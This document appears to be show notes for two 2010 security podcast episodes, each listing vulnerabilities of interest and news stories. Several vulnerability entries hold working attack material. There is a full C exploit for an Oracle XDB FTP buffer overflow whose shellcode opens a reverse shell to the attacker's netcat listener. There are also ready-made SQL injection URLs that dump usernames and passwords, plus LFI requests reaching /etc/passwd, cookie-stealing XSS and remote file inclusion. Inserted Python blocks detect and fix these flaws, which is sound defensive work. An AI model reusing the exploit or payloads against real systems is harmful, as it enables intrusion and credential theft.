Miller found all the holes by fuzzing, which involves bombarding an application’s input channels with as much corrupted data as possible. He said that Mac OS X is the safest OS because it is miles away from the action. However it is so full of bugs that any hacker who wants to can easily take it down.

“Mac OS X is like living in a farmhouse in the country with no locks, and Windows is living in a house with bars on the windows in the bad part of town,” Miller said. Apple’s position with regard to security continues to be quite relaxed. “It will not think it has a security problem until it affects [the company's] bottom line, which hasn’t been the case, yet”, he said.

2010
03.22

InfoSec Daily Podcast

 
ISD Podcast Episode 92 for March 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. Nensor CMS is subject to remote SQL injection and local file inclusion vulnerabilities. Exploiting this issue could allow an attacker access to sensitive data or complete system compromise.  Version 2.01 is impacted. Example LFI URL:

      http://www.sample.com/x/modules/javascript.php?sPage=[LFI%00]

      Auth Bypass:
      $sql = "SELECT
      iKey,sUsername,iKeyGroup,bForumAdmin,sLanguage,sPassword,sMail,sType
      FROM tb_users
      WHERE
      sUsername='".strInput($_POST["sUsername"])."'
      AND sPassword='".md5($_POST["sPassword"])."'
      AND bActive=1";

    2. Oracle XDB FTP is subject to a buffer overflow vulnerability in the UNLOCK command. Exploit code is available:
      exploit win32
      #include <stdio.h>
      #include <windows.h>
      #include <winsock.h>

      int GainControlOfOracle(char *, char *);
      int StartWinsock(void);
      int SetUpExploit(char *,int);

      struct sockaddr_in s_sa;
      struct hostent *he;
      unsigned int addr;
      char host[value data]=”";

      //register acces\
      unsigned char exploit[value data]=
      “x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF”
      “xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50″
      “x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C”
      “x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89″
      “x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13″
      “x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC”
      “x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C”
      “x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89″
      “x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83″
      “xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89″
      “x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33″
      “xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A”
      “x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66″
      “x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45″
      “xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0″
      “x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84″
      “x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57″
      “x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50″
      “x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8″
      “x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD”
      “x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03″
      “x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48″
      “x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83″
      “xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41″
      “x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03″
      “x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3″
      “x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C”
      “xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8″
      “x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B”
      “x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B”
      “xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF”
      “xFFxFFxFFxFF”;

      char exploit_code[value data]=
      “UNLOCK / put character”
      “put character”
      “put character”
      “put character”
      “put character” ———>char or nummeric—–or combine
      chart&nummeric
      “5eeefffggghhh”;

      char exception_handler[value dataX]=”x79x9Bxf7x77″;
      char short_jump[value dataX]=”xEBx06x90x90″;

      int main(int argc, char *argv[])
      {

      if(argc != 6)
      {
      printf(“nntOracle XDB FTP Service UNLOCK Buffer Overflow
      Exploit”);
      printf(“nntSpawns a reverse shell to specified port”);
      printf(“nntUsage:t%s host userid password ipaddress
      port”,argv[0]);
      printf(“nt6th maret 2010nnn”);
      return 0;
      }

      strncpy(host,argv[1],250);
      if(StartWinsock()==0)
      return printf(“Error starting Winsock.n”);

      SetUpExploit(argv[4],atoi(argv[5]));

      strcat(exploit_code,short_jump);
      strcat(exploit_code,exception_handler);
      strcat(exploit_code,exploit);
      strcat(exploit_code,”rn”);

      GainControlOfOracle(argv[2],argv[3]);

      return 0;

      }

      int SetUpExploit(char *myip, int myport)—>protocol
      {
      unsigned int ip=0;
      unsigned short prt=0;
      char *ipt=”";
      char *prtt=”";

      ip = inet_addr(myip);

      ipt = (char*)&ip;
      exploit[value data]=ipt[0];
      exploit[value data]=ipt[1];
      exploit[value data]=ipt[2];
      exploit[value data]=ipt[3];

      // set the TCP port to connect on
      // netcat should be listening on this port
      // e.g. nc -l -p 80

      prt = htons((unsigned short)myport);
      prt = prt ^ 0xFFFF;
      prtt = (char *) &prt;
      exploit[value data]=prtt[0];
      exploit[value data]=prtt[1];

      return 0;
      }

      int StartWinsock()
      {
      int err=0;
      WORD wVersionRequested;
      WSADATA wsaData;

      wVersionRequested = MAKEWORD( 2, 0 );
      err = WSAStartup( wVersionRequested, &wsaData );
      if ( err != 0 )
      return 0;
      if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) !=
      0 )
      {
      WSACleanup( );
      return 0;
      }

      if (isalpha(host[0]))
      {
      he = gethostbyname(host);
      s_sa.sin_addr.s_addr=INADDR_ANY;
      s_sa.sin_family=AF_INET;
      memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
      }
      else
      {
      addr = inet_addr(host);
      s_sa.sin_addr.s_addr=INADDR_ANY;
      s_sa.sin_family=AF_INET;
      memcpy(&s_sa.sin_addr,&addr,4);
      he = (struct hostent *)1;
      }

      if (he == NULL)
      {
      return 0;
      }
      return 1;
      }

      int GainControlOfOracle(char *user, char *pass)
      {

      char usercmd[value dataXX]=”user “;
      char passcmd[value dataXX]=”pass “;
      char resp[1600]=”";
      int snd=0,rcv=0;
      struct sockaddr_in r_addr;
      SOCKET sock;

      strncat(usercmd,user,230);
      strcat(usercmd,”rn”);
      strncat(passcmd,pass,230);
      strcat(passcmd,”rn”);

      sock=socket(AF_INET,SOCK_STREAM,0);
      if (sock==INVALID_SOCKET)
      return printf(” sock error”);

      r_addr.sin_family=AF_INET;
      r_addr.sin_addr.s_addr=INADDR_ANY;
      r_addr.sin_port=htons((unsigned short)0);
      s_sa.sin_port=htons((unsigned short)2100);

      if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
      return printf(“Connect error”);

      rcv = recv(sock,resp,1500,0);
      printf(“%s”,resp);
      ZeroMemory(resp,1600);

      snd=send(sock, usercmd , strlen(usercmd) , 0);
      rcv = recv(sock,resp,1500,0);
      printf(“%s”,resp);
      ZeroMemory(resp,1600);

      snd=send(sock, passcmd , strlen(passcmd) , 0);
      rcv = recv(sock,resp,1500,0);
      printf(“%s”,resp);
      if(resp[0]==’5′)
      {
      closesocket(sock);
      return printf(“Failed to log in using user %s and password
      %s.n”,user,pass);
      }
      ZeroMemory(resp,1600);

      snd=send(sock, exploit_code, strlen(exploit_code) , 0);

      Sleep(2000);

      closesocket(sock);
      return 0;
      }

    3. Sahana is subject to an authentication bypass vulnerability. Exploiting this issue could allow an attacker access to sensitive data or complete system compromise.  Version 0.6.2.2 is impacted. Example URL:

      http://www.sample.com/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl

    4. ArGoSoft FTP Server .NET is subject to a directory traversal vulnerability. Exploiting this issue could allow an attacker access to sensitive data or complete system compromise.  Version 1.0.2.1 is impacted. Example commands:
      CWD …
      250 Requested file action OK, completed
      XPWD
      257 “/…/” is working directory
      CWD …
      250 Requested file action OK, completed
      XPWD
      257 “/…/…/” is working directory
    5. The Joomla VXDate component is subject to Cross Site Scripting, Path Disclosure and SQL injection vulnerabilities. Potentially all versions of VXDate are impacted. Path Disclosure example URLs:

      http://www.sample.com/index.php?option=com_vxdate&ct=&#65533;

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=details&id=&;#65533;

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=editform&id=&amp;#65533;

      SQL Injection example URLs:

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5

      Cross Site Scripting example URLs:

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

      http://www.sample.com/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    6. Philweb is subject to a remote SQL injection vulnerability because it fails to sanitize user supplied input in a SQL query. Version 1.02 is impacted. Example URL:
      http://www.sample.com/buscahost_forum.asp?forumid=Sql ||
    7. phpAuthent is subject to a remote SQL injection vulnerability because it fails to sanitize user supplied input in a SQL query. Version 0.2.1 is impacted. Example URL:

      http://www.sample.com/news_releases.php?nid=-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users

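The Nensor CMS query in item 1 above splices the posted username straight into the SQL text and compares an unsalted md5. The Python/sqlite3 snippet below is an added example written for these show notes, not Nensor code: it reproduces the vulnerable query shape beside a parameterised lookup that verifies a salted PBKDF2 hash in constant time, so both behaviours can be tried against the same table. The table columns beyond those in the page's query, the single user row and the PBKDF2 settings are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

# Iteration count for PBKDF2-HMAC-SHA256; a value assumed for this demo.
PBKDF2_ITERATIONS = 100_000


def md5_hex(text: str) -> str:
    """Unsalted MD5 as the page's query uses it (kept only for the vulnerable path)."""
    return hashlib.md5(text.encode()).hexdigest()


def pbkdf2_hex(password: str, salt: bytes) -> str:
    """Salted, deliberately slow hash for the hardened path."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS).hex()


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for tb_users with one made-up user: alice / 'correct horse'.

    sPassword holds the unsalted md5 the page's query compares against;
    sPwdHash and sSalt (assumed column names) hold the hardened replacement.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tb_users (iKey INTEGER PRIMARY KEY, sUsername TEXT,"
        " sPassword TEXT, sPwdHash TEXT, sSalt TEXT, bActive INTEGER)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO tb_users VALUES (1, 'alice', ?, ?, ?, 1)",
        (md5_hex("correct horse"), pbkdf2_hex("correct horse", salt), salt.hex()),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Same shape as the page's query: the username is concatenated into the SQL.

    Deliberately vulnerable: a quote in `username` closes the string literal and
    whatever follows is parsed as SQL, so the password clause can be commented out.
    """
    sql = (
        "SELECT iKey, sUsername FROM tb_users"
        " WHERE sUsername='" + username + "'"
        " AND sPassword='" + md5_hex(password) + "'"
        " AND bActive=1"
    )
    return conn.execute(sql).fetchone()


def login_hardened(conn: sqlite3.Connection, username: str, password: str):
    """Bound parameter for the username; the hash is compared in code, in constant time."""
    row = conn.execute(
        "SELECT iKey, sUsername, sPwdHash, sSalt FROM tb_users"
        " WHERE sUsername = ? AND bActive = 1",
        (username,),
    ).fetchone()
    if row is None:
        return None
    key, name, stored_hash, salt_hex = row
    candidate = pbkdf2_hex(password, bytes.fromhex(salt_hex))
    if not hmac.compare_digest(candidate, stored_hash):
        return None
    return (key, name)


if __name__ == "__main__":
    db = build_db()
    crafted = "' OR '1'='1' -- "  # textbook tautology: closes the literal, comments out the rest
    print("vulnerable, crafted username:", login_vulnerable(db, crafted, "anything"))
    print("hardened,   crafted username:", login_hardened(db, crafted, "anything"))
    print("hardened,   real credentials:", login_hardened(db, "alice", "correct horse"))
```

The hardened version also moves the password check out of the WHERE clause: the database only answers "which active row has this username", and the application decides whether the supplied password matches, which keeps timing and error behaviour identical for unknown users and wrong passwords.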
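The example URLs in items 1, 5, 6 and 7 above are also exactly what these attacks look like in a web server's access log. As an added example (not from the page or from any of the projects listed), the Python below scans constructed combined-log-format lines for the request shapes quoted in this list: UNION SELECT and boolean tautologies, script tags, ../ traversal with a %00 byte, and query values that are themselves URLs (remote file inclusion). The log lines, IP addresses and the signature set are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed combined-log-format lines (not from the page). The request targets
# reuse the URL shapes quoted in this episode's vulnerability list; the hosts are
# RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Mar/2010:10:01:02 +0000] "GET /index.php?option=com_vxdate&ct=1&md=details&id=7 HTTP/1.1" 200 5120
203.0.113.7 - - [22/Mar/2010:10:01:09 +0000] "GET /news_releases.php?nid=-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users HTTP/1.1" 200 812
203.0.113.7 - - [22/Mar/2010:10:01:15 +0000] "GET /index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5 HTTP/1.1" 200 640
203.0.113.8 - - [22/Mar/2010:10:02:01 +0000] "GET /staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1423
203.0.113.9 - - [22/Mar/2010:10:02:30 +0000] "GET /index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2210
203.0.113.9 - - [22/Mar/2010:10:03:12 +0000] "GET /content/plugins/wallpapers/wallpapers.php?includes_path=http://198.51.100.4/x.txt HTTP/1.1" 500 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signatures are matched against the percent-decoded, lower-cased request target.
RULES = {
    "sqli": [
        re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b"),
        re.compile(r"(?:^|\W)(?:or|and)\s+[\w'\"()]+\s*=\s*[\w'\"()]+"),
    ],
    "xss": [
        re.compile(r"<\s*script\b"),
        re.compile(r"javascript:"),
    ],
    "lfi": [
        re.compile(r"\.\.[/\\]"),
        re.compile(r"/etc/passwd\b"),
        re.compile("\x00"),  # NUL byte used to truncate a suffix the app appends
    ],
}
REMOTE_SCHEME_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def classify_target(target: str) -> set:
    """Return the set of attack classes whose signatures the request target matches."""
    decoded = unquote_plus(target).lower()
    tags = {tag for tag, patterns in RULES.items() if any(p.search(decoded) for p in patterns)}
    # Remote file inclusion: a query parameter whose value is itself a URL.
    query = urlsplit(target).query
    if any(REMOTE_SCHEME_RE.match(value) for _, value in parse_qsl(query, keep_blank_values=True)):
        tags.add("rfi")
    return tags


def scan_log(text: str) -> list:
    """Parse each log line and report the ones that match at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these separately
        tags = classify_target(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "target": m["target"], "tags": sorted(tags)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["tags"], hit["target"])
```

Decoding before matching matters: the XSS and null-byte requests only reveal themselves after percent-decoding, and the phpAuthent request uses `+` for spaces, which `unquote_plus` handles. The tautology rule is intentionally narrow (an `or`/`and` followed by an equality) to keep false positives low on ordinary query strings.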
Stories of Interest:
News item 1:  http://www.informationweek.com/news/security/cybercrime/showArticle.jhtml?articleID=224000085
The Senate Wednesday re-introduced a cybersecurity bill it considered last year, minus a provision that would have allowed the president to shut down the Internet in the event of a major cyber attack.  The Cybersecurity Act, S. 773, co-sponsored by Senators Jay Rockefeller (D-W.Va.) and Olympia Snowe (R-Maine), is aimed at protecting critical U.S. network infrastructure against cybersecurity threats by fostering collaboration between the federal government and the private sectors that maintain that infrastructure.

The legislation was originally introduced last April in a two-bill package that together called for the creation of a national cybersecurity adviser, as well as aimed to revise cybersecurity processes and oversight in government, facilitate public-private partnerships on keeping computer systems safe, fund cybersecurity research, and encourage the hiring of more cybersecurity specialists.

Companion legislation that would create the national cybersecurity adviser position — the National Cybersecurity Advisor Act, S.778 — is still pending before the Senate Committee on Homeland Security and Government Affairs.

The new Cybersecurity Act more or less maintains the goals of the original bill, but also has some key differences.

One big one is that it no longer gives the president unilateral power to disconnect networks from the Internet in the event of a major cyber attack.

As written now, the bill requires the president to work with organizations that own critical network infrastructure to come up with cybersecurity emergency response plans rather than take action on his own.

News item 2: http://www.cio.com/article/585663/Fired_CISO_Says_His_Comments_Never_Put_Penn._s_Data_At_Risk
Robert Maley admits he was wrong to speak at the RSA security conference and confirmed the state of Pennsylvania fired him. In an interview with ComputerWorld, Maley gives his side on why he talked to other security professionals about issues involving his then-employer’s legacy systems.

What exactly happened?

They terminated me. I was specifically asked not to talk about anything in Pennsylvania without explicit permission and to have everything that I would say to be completely reviewed before I said it. So yeah, they told me that, and, yup, I was wrong ultimately doing that. As far as the official reason, that’s why. It’s not because of the PennDOT incident. It was because I did not have permission to speak. Not just at RSA, I wasn’t permitted to speak anywhere. I was on vacation when I went there. I went out there on my own time.

So what happened at PennDOT?

There’s been a lot of speculation in the press about the PennDOT incident. First, it wasn’t a hacking. It was an anomaly. Something happened. It was caught. It was identified. The incident was closed and the vulnerability was closed as well. I would have never spoken in public about any vulnerability that would have exposed the citizens of the commonwealth. That is something I have never done and never would do. I was using [the PennDOT incident] as an example of legacy applications that are still at risk. The whole purpose of using that as an example is that the people at RSA are the ones who are responsible for protecting their citizens, their company. It helps for people to know what is really going on, about how fast things are changing.

It’s your position that you compromised nothing by speaking at RSA?

Nothing. The vulnerability has been fixed. Everything I talked about was either part of a public submission or was available in press releases. I talked about prior breaches at Pennsylvania, but that was information I got from public press releases.

You talked about this being done on your own time. Should that have made a difference?

When I left, I had put in a vacation request and I was approved. They didn’t appreciate that I was doing it on my own time and they dismissed me. They canceled my vacation and said I was absent without leave … In the dismissal, they said I spoke without approval. My problem is I believe in what I am doing. For me, citizen safety comes first.

News item 3: http://blogs.computerworld.com/15780/federal_trade_honcho_google_is_the_enemy_of_privacy

Google’s greatest threat may not be Microsoft or Apple — instead, it may be the Federal Trade Commission (FTC), which increasingly is putting Google in its cross-hairs for serious privacy violations. Yesterday, Commissioner Pamela Jones Harbour lashed into Google for “irresponsible conduct” related to privacy, and said about Google Buzz, “consumer privacy cannot be run in beta.”

Harbour spoke at an FTC privacy roundtable, and said, according to the Wall Street Journal, “Protecting consumer privacy is of utmost importance. Unfortunately, many of the companies that consumers look to as leaders — and that we expect to be leaders — still have not taken this message entirely to heart.”

She was particularly harsh about Google CEO Eric Schmidt’s statement to CNBC that “If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place.” And she made clear that the FTC plans to take action if Google and other companies did not change the way they viewed online privacy, saying:

“The Commission will continue to evaluate consumers’ preferences, and armed with these insights, I hope and expect that the Commission will continue to shape the conversation about the intrinsic value of privacy. But make no mistake: The Commission will unfailingly step in to protect consumers where we believe the law has been violated, and that includes violations relating to privacy promises.”

2010
03.19

InfoSec Daily Podcast

 
ISD Podcast Episode 91 for March 19, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

  • Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
    • Washington DC – April 12th to 16th
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th

OuterZ0ne:

  • Outerz0ne March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
  • Starts early Saturday morning at the Wellesley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com) 1377 Virginia Avenue, Atlanta, GA 30344 (404) 762-5111
  • The next DC404 meeting will be at Outerz0ne

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services: WebSpeedway


Vulnerabilities of Interest:

    1. Chilly CMS is subject to a Cross Site Request Forgery (CSRF) vulnerability.  Proof of concept is available: http://www.opensourcecms.com/demo/2/292/chillyCMS
    2. Chilly CMS is subject to a persistent Cross Site Scripting (XSS) vulnerability. In ADD LINKS Field provide the malicious script to store in the Database. Proof of concept is available: http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php
    3. Short URL is subject to a Local File Inclusion (LFI) vulnerability. Version 1.01 is impacted. Example URL is available: http://www.sample.com/staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
    4. FCKEditor is subject to a Shell Upload vulnerability. Version 2.0 RC3 is impacted. The upload filter accepts the .php3 extension, so a PHP backdoor can be uploaded. Example URL is available: http://www.sample.com/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php
    5. phpBB2 Plus is subject to a SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.  Version 1.53 is impacted. Google Dork : inurl:kb.php?mode=cat&cat=. Example URL is available: http://www.sample.com/xxxxxx/kb.php?mode=cat&cat=-1+union+select+1,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,2–
    6. philboard is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The issue affects philboard 1.02; other versions may also be affected.  Example URL is available: http://www.sample.com/path/buscahost_forum.asp?forumid=Sql
    7. Softsaurus is subject to multiple Remote File Inclusion (RFI) vulnerabilities.  Version 2.01 is impacted, though others may be as well.  Example URLs are available:

      http://www.sample.com/content/plugins/wallpapers/wallpapers.php?includes_path=[Shell]

      http://www.sample.com/content/themes/softsaurus_default/pages/subHeader.php?objects_path=[Shell]

      http://www.sample.com/content/themes/softsaurus_stretched/pages/subHeader.php?objects_path=[Shell]

    8. PHP’s xmlrpc extension library is subject to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests. Exploiting these issues allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable library. PHP 5.3.1 is vulnerable; other versions may also be affected. Example php code is available:
      <?php
      $req = '<?xml version="1.0"?>
      <methodCall>
      </methodCall>';
      $result = xmlrpc_decode_request( $req, $frop );
      ?>

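Two items in these lists fail on path handling: ArGoSoft FTP (item 4 of the March 22 episode) walked out of its root on CWD arguments made only of dots, and Short URL (item 3 above) let a ../ chain ending in %00 reach /etc/passwd. Added example, not code from either project: a Python containment check that rejects NUL bytes and dot-only segments before normalising the requested path under a fixed root, plus an allow-list for the language-code case, where a short pattern is a better first line than path arithmetic. The root directories, the language-file naming and the accepted LANG_CODE format are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote


class PathViolation(ValueError):
    """Raised when a client-supplied path would leave its allowed root."""


def safe_join(root: str, requested: str, url_decode: bool = False) -> str:
    """Resolve `requested` beneath `root` (chroot semantics) or raise PathViolation.

    Covers the two failure modes in the episode's lists: dot-only directory
    names that some servers have treated as parent references, and a NUL byte
    used to truncate a path the application appends a suffix to.
    """
    if url_decode:
        requested = unquote(requested)
    if "\x00" in requested:
        raise PathViolation("NUL byte in path")
    for segment in requested.split("/"):
        # '.' and '..' are handled by normpath below; longer dot-only names are
        # rejected outright instead of trusting how a filesystem interprets them.
        if len(segment) > 2 and segment.count(".") == len(segment):
            raise PathViolation("dot-only path segment %r" % segment)
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if candidate != root and not candidate.startswith(root.rstrip("/") + "/"):
        raise PathViolation("path %r escapes %r" % (candidate, root))
    return candidate


def is_allowed(root: str, requested: str, url_decode: bool = False) -> bool:
    """Boolean wrapper around safe_join for callers that only need a verdict."""
    try:
        safe_join(root, requested, url_decode)
        return True
    except PathViolation:
        return False


# Assumed layout for the LANG_CODE case: language files live in one directory and
# are named after the code (constructed for the demo, not Short URL's real layout).
LANG_DIR = "/var/www/app/lang"
LANG_CODE_RE = re.compile(r"^[a-z]{2}(?:_[A-Z]{2})?$")


def select_language_file(lang_code: str) -> str:
    """Allow-list first, containment check second: the code must look like 'en' or 'pt_BR'."""
    decoded = unquote(lang_code)
    if not LANG_CODE_RE.match(decoded):
        raise PathViolation("language code %r not in allow-list" % lang_code)
    return safe_join(LANG_DIR, decoded + ".inc.php")


if __name__ == "__main__":
    ftp_root = "/srv/ftp"
    for arg in ["pub/docs", "pub/../incoming", "...", ".../...", "../../etc/passwd"]:
        print("CWD %-20s -> %s" % (arg, "allowed" if is_allowed(ftp_root, arg) else "rejected"))
    for code in ["en", "pt_BR", "../../../../../../../etc/passwd%00"]:
        try:
            print("LANG_CODE %-40s -> %s" % (code, select_language_file(code)))
        except PathViolation as err:
            print("LANG_CODE %-40s -> rejected (%s)" % (code, err))
```

The example uses `posixpath` so it runs without the directories existing; a server doing this for real should resolve with `os.path.realpath` after the same checks, so that symlinks inside the root cannot point back out of it.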
Stories of Interest:
News item 1:  http://www.v3.co.uk/v3/news/2259634/sec-sues-hacker-manipulating
The US Securities and Exchange Commission (SEC) has accused a Russian man of illegally manipulating share prices by hijacking people’s online trading accounts.  Valery Maltsev, who runs a firm called BroCo, is accused of stealing the login details for online share trading accounts and then using them to place orders for stock in which he had already taken a position.

Between August 2009 and December 2009 orders were placed at either a higher or lower price than was publicly quoted, enabling Maltsev to make a profit two different ways, according to the SEC’s court filing.

“These transactions have created the appearance of legitimate trading activity and have artificially affected the prices of at least 38 issuers,” the Securities and Exchange Commission said in a court filing.

News item 2:http://www.liquidmatrix.org/blog/2010/03/16/are-the-feds-in-your-social-network/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Liquidmatrix+%28Liquidmatrix%29

From Wired:

The next time someone tries to “friend” you on Facebook, it may turn out to be an undercover fed looking to examine your private messages and photos, or surveil your friends and family. The Electronic Frontier Foundation has obtained an internal Justice Department document that describes what law enforcement is doing on social networking sites.

The 33-page document shows that law enforcement agents from local police to the FBI and Secret Service have been logging on to MySpace and other sites undercover to communicate with suspects, read private postings and view photos and videos that are restricted to a user’s friends.

http://www.wired.com/images_blogs/threatlevel/2010/03/social-networking-for-law-enforcement.pdf

News item 3: http://www.v3.co.uk/computing/news/2259522/security-experts-warns-firms
Medium- and lower-risk flaws are being used more by hackers to penetrate enterprise networks, due to firms taking longer to patch them.  Security experts have warned businesses that hackers are moving their focus from flaws designated as high risk by software vendors to flaws normally seen as lower risks.

Lloyd’s of London chief information security officer Marcus Alldrick said, “[Hackers] are not going for the normal high risk flaws, they’re going for the medium risk ones. In the patch management cycle, the medium risk flaws are being patched later.”

That patching delay is being exacerbated by hackers combining the lower-risk flaws into so-called blended threats, explained Ray Stanton, BT’s global head of business continuity, security and governance practice. By chaining two lower-risk flaws, hackers can create a high-risk threat to an organization.

“Individually a lot of those low or medium threats may not pose a great risk, when you connect them together, it gives the opportunity to use ‘blended’ threats.”

News item 4: http://technologyexpert.blogspot.com/2010/03/disgrunted-former-employee-remotely.html
A disgruntled former employee of Austin-based car dealership Texas Auto Center disabled over 100 cars, sometimes setting their horns honking wildly, by logging into the dealership’s vehicle immobilization system, which is designed for repossessing cars. The suspect, Oscar Ramos-Lopez, 20, has been arrested and charged with breach of computer security.

The technology in question is a system called Webtech Plus. Operated by Cleveland-based Pay Technologies, car dealers install a small black box under dashboards that responds to remote commands relayed over wireless pager network. While the system will not stop a vehicle that’s being driven, it can disable a car’s ignition system, or trigger the horn.

